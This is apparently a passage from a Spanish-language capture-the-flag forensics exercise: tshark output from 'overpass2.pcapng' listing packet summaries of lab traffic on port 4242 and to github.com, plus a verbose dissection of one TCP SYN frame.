   58 48.997256109 192.168.170.145 → 192.168.170.159 TCP 66 [TCP Keep-Alive] 47736 → 80 [ACK] Seq=400 Ack=1 Win=64256 Len=0 TSval=3256108707 TSecr=894477631
   59 48.997335350 192.168.170.159 → 192.168.170.145 TCP 66 [TCP Keep-Alive ACK] 80 → 47736 [ACK] Seq=1 Ack=401 Win=64768 Len=0 TSval=894487870 TSecr=3256088284
   60 52.615293905 192.168.170.145 → 192.168.170.159 TCP 80 4242 → 57680 [PSH, ACK] Seq=59 Ack=379 Win=65152 Len=14 TSval=3256112325 TSecr=894487468
   61 52.615822285 192.168.170.159 → 192.168.170.145 TCP 81 57680 → 4242 [PSH, ACK] Seq=379 Ack=73 Win=64256 Len=15 TSval=894491489 TSecr=3256112325
   62 52.615888056 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=73 Ack=394 Win=65152 Len=0 TSval=3256112326 TSecr=894491489
   63 52.616362367 192.168.170.159 → 192.168.170.145 TCP 117 57680 → 4242 [PSH, ACK] Seq=394 Ack=73 Win=64256 Len=51 TSval=894491489 TSecr=3256112326
   64 52.616371067 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=73 Ack=445 Win=65152 Len=0 TSval=3256112326 TSecr=894491489
   65 52.616574160 192.168.170.159 → 192.168.170.145 TCP 130 57680 → 4242 [PSH, ACK] Seq=445 Ack=73 Win=64256 Len=64 TSval=894491489 TSecr=3256112326
   66 52.616619251 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=73 Ack=509 Win=65152 Len=0 TSval=3256112326 TSecr=894491489
   67 59.237795390 192.168.170.145 → 192.168.170.159 TCP 66 [TCP Keep-Alive] 47736 → 80 [ACK] Seq=400 Ack=1 Win=64256 Len=0 TSval=3256118947 TSecr=894487870
   68 59.237911793 192.168.170.159 → 192.168.170.145 TCP 66 [TCP Keep-Alive ACK] 80 → 47736 [ACK] Seq=1 Ack=401 Win=64768 Len=0 TSval=894498111 TSecr=3256088284
   69 69.478321357 192.168.170.145 → 192.168.170.159 TCP 66 [TCP Keep-Alive] 47736 → 80 [ACK] Seq=400 Ack=1 Win=64256 Len=0 TSval=3256129188 TSecr=894498111
   70 69.478401749 192.168.170.159 → 192.168.170.145 TCP 66 [TCP Keep-Alive ACK] 80 → 47736 [ACK] Seq=1 Ack=401 Win=64768 Len=0 TSval=894508351 TSecr=3256088284
   71 70.421572879 192.168.170.145 → 192.168.170.159 TCP 75 4242 → 57680 [PSH, ACK] Seq=73 Ack=509 Win=65152 Len=9 TSval=3256130131 TSecr=894491489
   72 70.422063989 192.168.170.159 → 192.168.170.145 TCP 76 57680 → 4242 [PSH, ACK] Seq=509 Ack=82 Win=64256 Len=10 TSval=894509294 TSecr=3256130131
   73 70.422069829 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=82 Ack=519 Win=65152 Len=0 TSval=3256130131 TSecr=894509294
   74 70.423887636 192.168.170.159 → 192.168.170.145 TCP 76 57680 → 4242 [PSH, ACK] Seq=519 Ack=82 Win=64256 Len=10 TSval=894509296 TSecr=3256130131
   75 70.423890196 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=82 Ack=529 Win=65152 Len=0 TSval=3256130133 TSecr=894509296
   76 71.650622407 192.168.170.145 → 192.168.170.159 TCP 89 4242 → 57680 [PSH, ACK] Seq=82 Ack=529 Win=65152 Len=23 TSval=3256131360 TSecr=894509296
   77 71.650937524 192.168.170.159 → 192.168.170.145 TCP 68 57680 → 4242 [PSH, ACK] Seq=529 Ack=105 Win=64256 Len=2 TSval=894510523 TSecr=3256131360
   78 71.650944424 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=105 Ack=531 Win=65152 Len=0 TSval=3256131360 TSecr=894510523
   79 71.674926908 192.168.170.159 → 192.168.170.145 TCP 127 57680 → 4242 [PSH, ACK] Seq=531 Ack=105 Win=64256 Len=61 TSval=894510547 TSecr=3256131360
   80 71.674933498 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=105 Ack=592 Win=65152 Len=0 TSval=3256131384 TSecr=894510547
   81 79.718858510 192.168.170.145 → 192.168.170.159 TCP 66 [TCP Keep-Alive] 47736 → 80 [ACK] Seq=400 Ack=1 Win=64256 Len=0 TSval=3256139428 TSecr=894508351
   82 79.718997584 192.168.170.159 → 192.168.170.145 TCP 66 [TCP Keep-Alive ACK] 80 → 47736 [ACK] Seq=1 Ack=401 Win=64768 Len=0 TSval=894518591 TSecr=3256088284
   83 80.220669335 192.168.170.145 → 192.168.170.159 TCP 71 4242 → 57680 [PSH, ACK] Seq=105 Ack=592 Win=65152 Len=5 TSval=3256139930 TSecr=894510547
   84 80.221093213 192.168.170.159 → 192.168.170.145 TCP 72 57680 → 4242 [PSH, ACK] Seq=592 Ack=110 Win=64256 Len=6 TSval=894519093 TSecr=3256139930
   85 80.221191495 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=110 Ack=598 Win=65152 Len=0 TSval=3256139930 TSecr=894519093
   86 80.221306458 192.168.170.159 → 192.168.170.145 TCP 95 57680 → 4242 [PSH, ACK] Seq=598 Ack=110 Win=64256 Len=29 TSval=894519094 TSecr=3256139930
   87 80.221365069 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=110 Ack=627 Win=65152 Len=0 TSval=3256139930 TSecr=894519094
   88 82.384925514 192.168.170.145 → 192.168.170.159 TCP 75 4242 → 57680 [PSH, ACK] Seq=110 Ack=627 Win=65152 Len=9 TSval=3256142094 TSecr=894519094
   89 82.385349973 192.168.170.159 → 192.168.170.145 TCP 76 57680 → 4242 [PSH, ACK] Seq=627 Ack=119 Win=64256 Len=10 TSval=894521257 TSecr=3256142094
   90 82.385355363 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=119 Ack=637 Win=65152 Len=0 TSval=3256142094 TSecr=894521257
   91 82.386795163 192.168.170.159 → 192.168.170.145 TCP 579 57680 → 4242 [PSH, ACK] Seq=637 Ack=119 Win=64256 Len=513 TSval=894521259 TSecr=3256142094
   92 82.386798183 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=119 Ack=1150 Win=64640 Len=0 TSval=3256142096 TSecr=894521259
   93 82.387045417 192.168.170.159 → 192.168.170.145 TCP 95 57680 → 4242 [PSH, ACK] Seq=1150 Ack=119 Win=64256 Len=29 TSval=894521259 TSecr=3256142096
   94 82.387106419 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=119 Ack=1179 Win=64640 Len=0 TSval=3256142096 TSecr=894521259
   95 85.689999379 192.168.170.145 → 192.168.170.159 TCP 74 4242 → 57680 [PSH, ACK] Seq=119 Ack=1179 Win=64640 Len=8 TSval=3256145399 TSecr=894521259
   96 85.690358617 192.168.170.159 → 192.168.170.145 TCP 75 57680 → 4242 [PSH, ACK] Seq=1179 Ack=127 Win=64256 Len=9 TSval=894524562 TSecr=3256145399
   97 85.690407117 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=127 Ack=1188 Win=64640 Len=0 TSval=3256145399 TSecr=894524562
   98 85.693199973 192.168.170.159 → 192.168.170.145 TCP 93 57680 → 4242 [PSH, ACK] Seq=1188 Ack=127 Win=64256 Len=27 TSval=894524565 TSecr=3256145399
   99 85.693319126 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=127 Ack=1215 Win=64640 Len=0 TSval=3256145402 TSecr=894524565
  100 87.592945663 192.168.170.145 → 192.168.170.159 TCP 89 4242 → 57680 [PSH, ACK] Seq=127 Ack=1215 Win=64640 Len=23 TSval=3256147302 TSecr=894524565
  101 87.594143248 192.168.170.159 → 192.168.170.145 TCP 68 57680 → 4242 [PSH, ACK] Seq=1215 Ack=150 Win=64256 Len=2 TSval=894526466 TSecr=3256147302
  102 87.594229619 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=150 Ack=1217 Win=64640 Len=0 TSval=3256147303 TSecr=894526466
  103 87.599894814 192.168.170.159 → 192.168.170.145 TCP 370 57680 → 4242 [PSH, ACK] Seq=1217 Ack=150 Win=64256 Len=304 TSval=894526472 TSecr=3256147303
  104 87.599948715 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=150 Ack=1521 Win=64384 Len=0 TSval=3256147309 TSecr=894526472
  105 89.958341754 192.168.170.145 → 192.168.170.159 TCP 66 [TCP Keep-Alive] 47736 → 80 [ACK] Seq=400 Ack=1 Win=64256 Len=0 TSval=3256149667 TSecr=894518591
  106 89.958477887 192.168.170.159 → 192.168.170.145 TCP 66 [TCP Keep-Alive ACK] 80 → 47736 [ACK] Seq=1 Ack=401 Win=64768 Len=0 TSval=894528830 TSecr=3256088284
  107 92.969168584 192.168.170.138 → 91.189.91.157 NTP 90 NTP Version 4, client
  108 93.049609940 VMware_f9:85:10 → Broadcast    ARP 60 Who has 192.168.170.138? Tell 192.168.170.2
  109 93.049623211 VMware_82:6c:a5 → VMware_f9:85:10 ARP 42 192.168.170.138 is at 00:0c:29:82:6c:a5
  110 93.049776854 91.189.91.157 → 192.168.170.138 NTP 90 NTP Version 4, server
  111 95.931106336 192.168.170.145 → 192.168.170.159 TCP 87 4242 → 57680 [PSH, ACK] Seq=150 Ack=1521 Win=64384 Len=21 TSval=3256155640 TSecr=894526472
  112 95.931488256 192.168.170.159 → 192.168.170.145 TCP 88 57680 → 4242 [PSH, ACK] Seq=1521 Ack=171 Win=64256 Len=22 TSval=894534803 TSecr=3256155640
  113 95.931564807 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=171 Ack=1543 Win=64384 Len=0 TSval=3256155640 TSecr=894534803
  114 95.935050278 192.168.170.159 → 192.168.170.145 TCP 1528 57680 → 4242 [PSH, ACK] Seq=1543 Ack=171 Win=64256 Len=1462 TSval=894534807 TSecr=3256155640
  115 95.935095939 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=171 Ack=3005 Win=64128 Len=0 TSval=3256155644 TSecr=894534807
  116 95.935531281 192.168.170.159 → 192.168.170.145 TCP 95 57680 → 4242 [PSH, ACK] Seq=3005 Ack=171 Win=64256 Len=29 TSval=894534807 TSecr=3256155644
  117 95.935587742 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=171 Ack=3034 Win=64128 Len=0 TSval=3256155644 TSecr=894534807
  118 98.107828955 VMware_82:6c:a5 → VMware_f9:85:10 ARP 42 Who has 192.168.170.2? Tell 192.168.170.138
  119 98.107934218 VMware_f9:85:10 → VMware_82:6c:a5 ARP 60 192.168.170.2 is at 00:50:56:f9:85:10
  120 130.788992697 192.168.170.145 → 192.168.170.159 TCP 118 4242 → 57680 [PSH, ACK] Seq=171 Ack=3034 Win=64128 Len=52 TSval=3256190497 TSecr=894534807
  121 130.789693015 192.168.170.159 → 192.168.170.145 TCP 121 57680 → 4242 [PSH, ACK] Seq=3034 Ack=223 Win=64256 Len=55 TSval=894569661 TSecr=3256190497
  122 130.789742216 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=223 Ack=3089 Win=64128 Len=0 TSval=3256190497 TSecr=894569661
  123 130.790524817 192.168.170.159 → 192.168.170.145 TCP 98 57680 → 4242 [PSH, ACK] Seq=3089 Ack=223 Win=64256 Len=32 TSval=894569661 TSecr=3256190497
  124 130.790594169 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=223 Ack=3121 Win=64128 Len=0 TSval=3256190498 TSecr=894569661
  125 130.812969381 192.168.170.159 → 192.168.170.2 DNS 81 Standard query 0xea9e A github.com OPT
  126 130.813022012 192.168.170.159 → 192.168.170.2 DNS 81 Standard query 0xa865 AAAA github.com OPT
  127 130.821353619 VMware_f9:85:10 → Broadcast    ARP 60 Who has 192.168.170.159? Tell 192.168.170.2
  128 130.821367729 VMware_6e:18:17 → VMware_f9:85:10 ARP 60 192.168.170.159 is at 00:0c:29:6e:18:17
  129 130.821456311 192.168.170.2 → 192.168.170.159 DNS 165 Standard query response 0xa865 AAAA github.com SOA ns-1707.awsdns-21.co.uk OPT
  130 130.834210483 192.168.170.2 → 192.168.170.159 DNS 97 Standard query response 0xea9e A github.com A 140.82.118.4 OPT
  131 130.840570509 192.168.170.159 → 140.82.118.4 TCP 74 42174 → 443 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=1118180778 TSecr=0 WS=128
  132 130.868572111 140.82.118.4 → 192.168.170.159 TCP 60 443 → 42174 [SYN, ACK] Seq=0 Ack=1 Win=64240 Len=0 MSS=1460
  133 130.868722995 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1 Ack=1 Win=64240 Len=0
  134 130.894779433 192.168.170.159 → 140.82.118.4 TLSv1 290 Client Hello
  135 130.894864666 140.82.118.4 → 192.168.170.159 TCP 60 443 → 42174 [ACK] Seq=1 Ack=237 Win=64240 Len=0
  136 130.923858220 140.82.118.4 → 192.168.170.159 TLSv1.2 1490 Server Hello
  137 130.923918441 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=237 Ack=1437 Win=63184 Len=0
  138 130.924009433 140.82.118.4 → 192.168.170.159 TLSv1.2 2058 Certificate, Server Key Exchange, Server Hello Done
  139 130.924070965 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=237 Ack=3441 Win=63184 Len=0
  140 130.924943889 192.168.170.159 → 140.82.118.4 TLSv1.2 129 Client Key Exchange
  141 130.925008519 192.168.170.159 → 140.82.118.4 TLSv1.2 105 Change Cipher Spec, Encrypted Handshake Message
  142 130.925010399 140.82.118.4 → 192.168.170.159 TCP 60 443 → 42174 [ACK] Seq=3441 Ack=312 Win=64240 Len=0
  143 130.925010899 140.82.118.4 → 192.168.170.159 TCP 60 443 → 42174 [ACK] Seq=3441 Ack=363 Win=64240 Len=0
  144 131.038254985 140.82.118.4 → 192.168.170.159 TLSv1.2 105 Change Cipher Spec, Encrypted Handshake Message
  145 131.038924192 192.168.170.159 → 140.82.118.4 TLSv1.2 282 Application Data
  146 131.038973985 140.82.118.4 → 192.168.170.159 TCP 60 443 → 42174 [ACK] Seq=3492 Ack=591 Win=64240 Len=0
  147 131.405066405 140.82.118.4 → 192.168.170.159 TLSv1.2 474 Application Data
  148 131.413988747 140.82.118.4 → 192.168.170.159 TLSv1.2 88 Application Data
  149 131.414117629 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=591 Ack=3946 Win=63184 Len=0
  150 131.415503346 140.82.118.4 → 192.168.170.159 TLSv1.2 408 Application Data
  151 131.415743931 140.82.118.4 → 192.168.170.159 TLSv1.2 152 Application Data
  152 131.415819643 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=591 Ack=4398 Win=63184 Len=0
  153 131.416248475 140.82.118.4 → 192.168.170.159 TLSv1.2 86 Application Data
  154 131.416464271 140.82.118.4 → 192.168.170.159 TLSv1.2 94 Application Data
  155 131.416543553 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=591 Ack=4470 Win=63184 Len=0
  156 131.418370130 192.168.170.159 → 140.82.118.4 TLSv1.2 490 Application Data
  157 131.418445612 140.82.118.4 → 192.168.170.159 TCP 60 443 → 42174 [ACK] Seq=4470 Ack=1027 Win=64240 Len=0
  158 131.738353327 140.82.118.4 → 192.168.170.159 TLSv1.2 422 Application Data
  159 131.754083486 140.82.118.4 → 192.168.170.159 TLSv1.2 86 Application Data
  160 131.754418814 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=4870 Win=63184 Len=0
  161 131.754441005 140.82.118.4 → 192.168.170.159 TLSv1.2 93 Application Data
  162 131.762910965 140.82.118.4 → 192.168.170.159 TLSv1.2 208 Application Data, Application Data
  163 131.763032179 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=5063 Win=63184 Len=0
  164 131.763155262 192.168.170.159 → 192.168.170.145 TCP 160 57680 → 4242 [PSH, ACK] Seq=3121 Ack=223 Win=64256 Len=94 TSval=894570634 TSecr=3256190498
  165 131.763270215 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=223 Ack=3215 Win=64128 Len=0 TSval=3256191471 TSecr=894570634
  166 131.788967723 140.82.118.4 → 192.168.170.159 TLSv1.2 1406 Application Data
  167 131.789534609 192.168.170.145 → 192.168.170.159 TCP 66 [TCP ACKed unseen segment] 4242 → 57680 [ACK] Seq=223 Ack=4860 Win=63488 Len=0 TSval=3256191497 TSecr=894570660
  168 131.789545279 192.168.170.159 → 192.168.170.145 TCP 1711 [TCP Spurious Retransmission] 57680 → 4242 [PSH, ACK] Seq=3215 Ack=223 Win=64256 Len=1645 TSval=894570660 TSecr=3256191471
  169 131.834482227 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=6415 Win=63184 Len=0
  170 131.838951814 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
  171 131.839037965 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=7814 Win=63184 Len=0
  172 131.839105227 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
  173 131.839150978 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=9213 Win=63184 Len=0
  174 131.847695021 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
  175 131.847756852 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=10612 Win=63184 Len=0
  176 131.847865055 140.82.118.4 → 192.168.170.159 TLSv1.2 1490 Application Data
  177 131.847870295 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=12048 Win=63184 Len=0
  178 131.848434910 192.168.170.159 → 140.82.118.4 TCP 60 [TCP ACKed unseen segment] 42174 → 443 [ACK] Seq=1027 Ack=14846 Win=63184 Len=0
  179 131.848437620 140.82.118.4 → 192.168.170.159 TCP 2852 [TCP Spurious Retransmission] 443 → 42174 [PSH, ACK] Seq=12048 Ack=1027 Win=64240 Len=2798
  180 131.848852261 140.82.118.4 → 192.168.170.159 TLSv1.2 774 Ignored Unknown Record
  181 131.848906412 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=15566 Win=63184 Len=0
  182 131.849720413 192.168.170.159 → 192.168.170.145 TCP 100 57680 → 4242 [PSH, ACK] Seq=4860 Ack=223 Win=64256 Len=34 TSval=894570721 TSecr=3256191497
  183 131.849772045 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=223 Ack=4894 Win=64128 Len=0 TSval=3256191557 TSecr=894570721
  184 131.849868017 192.168.170.159 → 192.168.170.145 TCP 100 57680 → 4242 [PSH, ACK] Seq=4894 Ack=223 Win=64256 Len=34 TSval=894570721 TSecr=3256191557
  185 131.849869847 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=223 Ack=4928 Win=64128 Len=0 TSval=3256191558 TSecr=894570721
  186 131.849980410 192.168.170.159 → 192.168.170.145 TCP 100 57680 → 4242 [PSH, ACK] Seq=4928 Ack=223 Win=64256 Len=34 TSval=894570721 TSecr=3256191558
  187 131.849982040 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=223 Ack=4962 Win=64128 Len=0 TSval=3256191558 TSecr=894570721
  188 131.850048142 192.168.170.159 → 192.168.170.145 TCP 100 57680 → 4242 [PSH, ACK] Seq=4962 Ack=223 Win=64256 Len=34 TSval=894570721 TSecr=3256191558
  189 131.850124294 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=223 Ack=4996 Win=64128 Len=0 TSval=3256191558 TSecr=894570721
  190 131.850181165 192.168.170.159 → 192.168.170.145 TCP 100 57680 → 4242 [PSH, ACK] Seq=4996 Ack=223 Win=64256 Len=34 TSval=894570721 TSecr=3256191558
  191 131.850182615 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=223 Ack=5030 Win=64128 Len=0 TSval=3256191558 TSecr=894570721
  192 131.850278739 192.168.170.159 → 192.168.170.145 TCP 100 57680 → 4242 [PSH, ACK] Seq=5030 Ack=223 Win=64256 Len=34 TSval=894570721 TSecr=3256191558
  193 131.850280589 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=223 Ack=5064 Win=64128 Len=0 TSval=3256191558 TSecr=894570721
  194 131.850374910 192.168.170.159 → 192.168.170.145 TCP 100 57680 → 4242 [PSH, ACK] Seq=5064 Ack=223 Win=64256 Len=34 TSval=894570721 TSecr=3256191558
  195 131.850376470 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=223 Ack=5098 Win=64128 Len=0 TSval=3256191558 TSecr=894570721
  196 131.873954554 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
  197 131.874032897 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=16965 Win=63184 Len=0
  198 131.874433746 140.82.118.4 → 192.168.170.159 TLSv1.2 1490 Application Data
  199 131.874441207 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=18401 Win=63184 Len=0
  200 131.874636281 140.82.118.4 → 192.168.170.159 TLSv1.2 1416 Application Data
  201 131.874638441 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=19763 Win=63184 Len=0
  202 131.875027452 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
  203 131.875054433 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=21162 Win=63184 Len=0
  204 131.924706244 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
  205 131.924810547 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=22561 Win=63184 Len=0
  206 131.925254738 140.82.118.4 → 192.168.170.159 TLSv1.2 2210 Application Data, Application Data
  207 131.925324681 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=24717 Win=63184 Len=0
  208 132.044977929 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
  209 132.045027690 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=26116 Win=63184 Len=0
  210 132.045108132 140.82.118.4 → 192.168.170.159 TLSv1.2 2889 Application Data, Application Data
  211 132.045156342 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=28951 Win=63184 Len=0
  212 132.045575673 140.82.118.4 → 192.168.170.159 TLSv1.2 1416 Application Data
  213 132.045640405 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=30313 Win=63184 Len=0
  214 132.046020945 140.82.118.4 → 192.168.170.159 TLSv1.2 1490 Application Data
  215 132.046175449 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=31749 Win=63184 Len=0
  216 132.046181229 140.82.118.4 → 192.168.170.159 TLSv1.2 2815 Application Data, Application Data
  217 132.046269741 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=34510 Win=63184 Len=0
  218 132.046508518 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=37382 Win=63184 Len=0
  219 132.046515448 140.82.118.4 → 192.168.170.159 TCP 2926 [TCP Spurious Retransmission] 443 → 42174 [PSH, ACK] Seq=34510 Ack=1027 Win=64240 Len=2872
  220 132.046943999 140.82.118.4 → 192.168.170.159 TLSv1.2 2778 Ignored Unknown Record
  221 132.046995951 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=40106 Win=63184 Len=0
  222 132.047117094 140.82.118.4 → 192.168.170.159 TLSv1.2 1321 Application Data
  223 132.047219827 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=41373 Win=63184 Len=0
  224 132.094178628 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
  225 132.094319951 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=42772 Win=63184 Len=0
  226 132.094446085 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
  227 132.129676781 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
  228 132.129759233 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=45570 Win=63184 Len=0
  229 132.129963958 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
  230 132.130342869 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
  231 132.130344819 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=48368 Win=63184 Len=0
  232 132.171939650 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
  233 132.172162936 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
  234 132.172169976 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=51166 Win=63184 Len=0
  235 132.178881331 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
  236 132.179088046 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
  237 132.179151938 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=53964 Win=63184 Len=0
  238 132.213735698 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
  239 132.214095967 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
  240 132.214176359 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=56762 Win=63184 Len=0

RESTO DE LA INFO........






VEMOS UNA PARTE EN MODO VERBOSE:




┌──(root㉿kalipaimon)-[/home/paimon/Descargas]
└─# tshark -r overpass2.pcapng -V
Running as user "root" and group "root". This could be dangerous.
Frame 1: 74 bytes on wire (592 bits), 74 bytes captured (592 bits) on interface ens33, id 0
    Section number: 1
    Interface id: 0 (ens33)
        Interface name: ens33
    Encapsulation type: Ethernet (1)
    Arrival Time: Jul 21, 2020 17:33:53.162229164 -03
    [Time shift for this packet: 0.000000000 seconds]
    Epoch Time: 1595363633.162229164 seconds
    [Time delta from previous captured frame: 0.000000000 seconds]
    [Time delta from previous displayed frame: 0.000000000 seconds]
    [Time since reference or first frame: 0.000000000 seconds]
    Frame Number: 1
    Frame Length: 74 bytes (592 bits)
    Capture Length: 74 bytes (592 bits)
    [Frame is marked: False]
    [Frame is ignored: False]
    [Protocols in frame: eth:ethertype:ip:tcp]
Ethernet II, Src: VMware_17:ba:48 (00:0c:29:17:ba:48), Dst: VMware_6e:18:17 (00:0c:29:6e:18:17)
    Destination: VMware_6e:18:17 (00:0c:29:6e:18:17)
        Address: VMware_6e:18:17 (00:0c:29:6e:18:17)
        .... ..0. .... .... .... .... = LG bit: Globally unique address (factory default)
        .... ...0 .... .... .... .... = IG bit: Individual address (unicast)
    Source: VMware_17:ba:48 (00:0c:29:17:ba:48)
        Address: VMware_17:ba:48 (00:0c:29:17:ba:48)
        .... ..0. .... .... .... .... = LG bit: Globally unique address (factory default)
        .... ...0 .... .... .... .... = IG bit: Individual address (unicast)
    Type: IPv4 (0x0800)
Internet Protocol Version 4, Src: 192.168.170.145, Dst: 192.168.170.159
    0100 .... = Version: 4
    .... 0101 = Header Length: 20 bytes (5)
    Differentiated Services Field: 0x00 (DSCP: CS0, ECN: Not-ECT)
        0000 00.. = Differentiated Services Codepoint: Default (0)
        .... ..00 = Explicit Congestion Notification: Not ECN-Capable Transport (0)
    Total Length: 60
    Identification: 0xd0e5 (53477)
    010. .... = Flags: 0x2, Don't fragment
        0... .... = Reserved bit: Not set
        .1.. .... = Don't fragment: Set
        ..0. .... = More fragments: Not set
    ...0 0000 0000 0000 = Fragment Offset: 0
    Time to Live: 64
    Protocol: TCP (6)
    Header Checksum: 0x9354 [validation disabled]
    [Header checksum status: Unverified]
    Source Address: 192.168.170.145
    Destination Address: 192.168.170.159
Transmission Control Protocol, Src Port: 47732, Dst Port: 80, Seq: 0, Len: 0
    Source Port: 47732
    Destination Port: 80
    [Stream index: 0]
    [Conversation completeness: Incomplete (0)]
    [TCP Segment Len: 0]
    Sequence Number: 0    (relative sequence number)
    Sequence Number (raw): 2491250218
    [Next Sequence Number: 1    (relative sequence number)]
    Acknowledgment Number: 0
    Acknowledgment number (raw): 0
    1010 .... = Header Length: 40 bytes (10)
    Flags: 0x002 (SYN)
        000. .... .... = Reserved: Not set
        ...0 .... .... = Accurate ECN: Not set
        .... 0... .... = Congestion Window Reduced: Not set
        .... .0.. .... = ECN-Echo: Not set
        .... ..0. .... = Urgent: Not set
        .... ...0 .... = Acknowledgment: Not set
        .... .... 0... = Push: Not set
        .... .... .0.. = Reset: Not set
        .... .... ..1. = Syn: Set
            [Expert Info (Chat/Sequence): Connection establish request (SYN): server port 80]
                [Connection establish request (SYN): server port 80]
                [Severity level: Chat]
                [Group: Sequence]
        .... .... ...0 = Fin: Not set
        [TCP Flags: ··········S·]
    Window: 64240
    [Calculated window size: 64240]
    Checksum: 0x67cd [unverified]
    [Checksum Status: Unverified]
